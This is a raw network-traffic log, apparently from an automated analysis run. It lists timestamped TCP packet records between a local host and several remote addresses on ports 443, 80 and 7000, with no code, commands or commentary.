                                                            Oct 3, 2024 06:53:07.123481989 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.123651028 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.123673916 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:07.888298035 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:07.888605118 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.891510010 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.891568899 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:07.891943932 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:07.893409967 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.935434103 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:08.505606890 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:08.505625963 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:08.505676031 CEST44349706185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:08.505860090 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:08.506690979 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:08.544097900 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:08.544194937 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:08.544334888 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:08.544605970 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:08.544641018 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.242774963 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.243015051 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.251653910 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.251708031 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.251909971 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.252682924 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.295491934 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.408087015 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.408895016 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.408941984 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.408961058 CEST4434970752.216.144.11192.168.2.5
                                                            Oct 3, 2024 06:53:09.409040928 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.409041882 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.409041882 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.414520025 CEST49707443192.168.2.552.216.144.11
                                                            Oct 3, 2024 06:53:09.875412941 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:09.875524998 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:09.875623941 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:09.875797033 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:09.875834942 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:09.881835938 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:09.887747049 CEST8049704104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:09.887824059 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:10.334218025 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:10.335820913 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:10.335885048 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:10.743309021 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:10.743411064 CEST44349708104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:10.743607998 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:10.744010925 CEST49708443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:12.540721893 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:12.540816069 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:12.540911913 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:12.541161060 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:12.541199923 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:13.004389048 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:13.005753040 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:13.005836010 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:13.592668056 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:13.592776060 CEST44349710104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:13.592834949 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:13.593364954 CEST49710443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:13.602267027 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:13.602314949 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:13.602382898 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:13.602835894 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:13.602873087 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.078356028 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.078480959 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.080017090 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.080045938 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.080466032 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.081372023 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.127441883 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.450495005 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.450627089 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.450699091 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.450714111 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.450764894 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.450831890 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.450850010 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.492320061 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.510296106 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510449886 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510510921 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.510525942 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510639906 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510700941 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.510715961 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510824919 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.510883093 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.510895967 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537306070 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537384033 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.537405014 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537641048 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537704945 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.537718058 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537806988 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.537863970 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.537877083 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.538120985 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.538176060 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.538188934 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.586046934 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.586060047 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.597266912 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.597328901 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.597342968 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.597451925 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.597510099 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.597522974 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598083019 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598140955 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.598155022 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598252058 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598306894 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.598319054 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598942041 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.598994970 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.599009991 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599101067 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599154949 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.599168062 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599744081 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599795103 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.599809885 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599885941 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.599940062 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.599952936 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625050068 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625159025 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625237942 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.625255108 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625344992 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625443935 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.625466108 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625524998 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.625631094 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.625700951 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.626391888 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.626526117 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.626540899 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.626581907 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.626617908 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.626640081 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.627294064 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.627361059 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.685326099 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.685436964 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.685458899 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.685493946 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.685528040 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.685564041 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.685614109 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.685683012 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.685744047 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.685813904 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.686470985 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.686539888 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.686678886 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.686752081 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.687495947 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.687567949 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.687586069 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.687638044 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.687684059 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.687863111 CEST44349711188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:14.687921047 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:14.688249111 CEST49711443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:15.251033068 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:15.256072998 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:15.256232023 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:15.421910048 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:15.426923037 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:26.855375051 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:26.860522985 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:27.229468107 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:27.281240940 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:27.286247015 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:27.421206951 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.426345110 CEST8049721104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:27.426887035 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.427201986 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.432024956 CEST8049721104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:27.892222881 CEST8049721104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:27.893407106 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.893485069 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:27.893567085 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.895808935 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:27.895832062 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:27.961062908 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.362915039 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.363008022 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.366904974 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.366914034 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.367235899 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.382477045 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.423444033 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.514761925 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.514966965 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.515036106 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.515737057 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.518873930 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.518929958 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:28.519053936 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.519288063 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.519316912 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.249829054 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.250272036 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.251722097 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.251777887 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.252155066 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.253621101 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.295475960 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731653929 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731719971 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731765032 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.731833935 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731873035 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731875896 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.734654903 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.839771032 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:30.043791056 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.043879986 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.043968916 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.049074888 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.049113989 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.620732069 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.620929003 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.626286983 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.626343966 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.626699924 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.629554987 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.675445080 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765286922 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765436888 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765687943 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.765752077 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765837908 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.772739887 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772759914 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772890091 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772990942 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.772990942 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.773885965 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.910020113 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910463095 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910521030 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.910645962 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910870075 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910885096 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.915642977 CEST8049721104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.915874958 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.372246981 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.374102116 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.374109030 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500391006 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500734091 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500926971 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.501256943 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:32.934662104 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:32.976911068 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:33.631196022 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631269932 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:33.631350040 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631619930 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631644011 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.100311041 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.101584911 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.101653099 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.227324963 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.227601051 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.228935957 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.229077101 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.230345964 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230386972 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.230465889 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230688095 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230704069 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.692018032 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.692089081 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.693492889 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.693501949 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.693979979 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.697334051 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.739401102 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100415945 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100547075 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100601912 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.100625992 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100702047 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100750923 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.100758076 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160026073 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160089016 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160108089 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160198927 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160244942 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160252094 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160626888 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160676003 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160681963 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186079025 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186137915 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186152935 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186249971 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186294079 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186302900 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186445951 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186499119 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186505079 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186611891 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186655045 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186661959 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186975002 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.187026978 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.187043905 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246350050 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246403933 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246423006 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246517897 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246562004 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246568918 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246666908 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246716976 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246725082 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246814013 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246860027 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246866941 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247302055 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247345924 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.247351885 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247793913 CEST44349728188.114.96.3192.168.2.5
